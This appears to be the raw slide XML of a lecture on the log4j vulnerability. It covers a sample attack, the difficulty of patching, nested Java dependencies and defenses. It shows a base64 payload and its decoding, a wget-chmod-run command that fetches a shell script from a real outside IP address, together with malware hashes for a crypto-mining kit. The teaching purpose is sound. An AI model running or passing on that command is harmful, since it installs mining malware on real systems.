              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FBE67948-E37B-8146-B4AE-DDD12651A7AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>d2dldCBodHRwOi8vNjIuMjEwLjEzMC4yNTAvbGguc2g7Y2htb2QgK3ggbGguc2g7Li9saC5zaA==</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In Base64 Decodes to</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>wget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> http://62.210.130.250/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>lh.sh;chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> +x </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>lh.sh</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lh.sh</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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73619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E624-B42E-3B4A-9F5E-1536BCB3892A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>log4j Sample Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C44D79CD-F691-FF4E-BD5C-14B8968F9C91}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Download file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" err="1"/>
              <a:t>lh.sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>-  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>wget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> http://62.210.130.250/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>lh.sh</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" b="1" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Make it executable - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> +x </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>lh.sh</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Run it - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>lh.sh</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18576803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C52A-6AF9-9046-BB46-A48317DB0992}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>log4j Sample Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1BCB8D42-1B7D-F84C-96F6-2825B67938EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>lh.sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>– shell script that downloaded and ran a 2 files (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>libsystem.so</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>kinsing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) all related to cryptocurrency mining operations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>lh.sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>– MD5: 0e1a1382d4fd420f8a5ae1d88b3085e7</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.virustotal.com/gui/file/4d44e9ffdaa91e0d63795b9a263a19ad1edd330d800005708cd44710ac09e653</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>libsystem.so</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>– MD5: ccef46c7edf9131ccffc47bd69eb743b</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.virustotal.com/gui/file/c38c21120d8c17688f9aeb2af5bdafb6b75e1d2673b025b720e50232f888808a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>kinsing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – MD5: 648effa354b3cbaad87b45f48d59c616 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://www.virustotal.com/gui/file/6e25ad03103a1a972b78c642bac09060fa79c460011dc5748cbb433cc459938b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35907051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1F89-4C4A-DF45-9094-BBF45E7D2C27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Patching Isn’t Always Easy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23587EA9-3759-0D49-8CE9-630677268A57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>You often need to test first – with the patch break something?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>What do you do if the patch breaks a critical system that is at the core of your organization?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>If a system brings in $50m/day in revenue do you want to risk taking that offline?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38120218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D4B1-02D4-294F-9710-00F3D27B314B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Patching Isn’t Always Easy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2743A5F6-EC07-4244-A2BA-F10031986F78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>What if you are in the middle of a change freeze?  Patching may take a system offline during a critical time period</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Ex: Finals week change freeze @ UMD – Dec 14th – 21</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" baseline="30000" dirty="0"/>
              <a:t>st</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="411480" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>What are the most important and highest risk assets?  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" dirty="0"/>
              <a:t>PRIORITIZE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1547036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8BD81-FC66-3647-90D0-032785185D6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Java Package Management is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" i="1" dirty="0"/>
              <a:t>Terrible</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{589C07A7-B63C-7543-8ED9-CBCDFD0E4F2E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="571500" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The log4j library may be independent of a Java JAR/WAR file.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A Java web archive (WAR) file might contain all the dependencies, such as the log4j library inside of it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A Java archive (JAR) file might contain all the dependencies, such as the log4j library, of a particular component. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A JAR file might contain another JAR file that could contain yet another JAR file (ad infinitum) burying the vulnerable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>libary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> several layers deep.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1284726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B5A5-0FA8-E24B-93F2-DA5AB266435F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>log4j – Why This Is a Big Deal</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5DA05C91-2B06-054D-8721-6E0C6381134C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>As mentioned log4j is used </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>EVERYWHERE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>EVERYTHING</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Java package management is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>TERRIBLE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> – it’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>REALLY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> hard and painful to determine if something is using a vulnerable library</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Multiple exploitation vectors – one attack attempt could compromise the web server, the application server, the logging server, the database server, or multiple systems.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20095514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62F6-06C0-F04C-A30C-41A6CA29CE27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>log4j Defenses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF6B334C-6279-EB4F-8735-CCF90C7A6700}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CISA’s guidance: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://github.com/cisagov/log4j-affected-db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Affected software: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
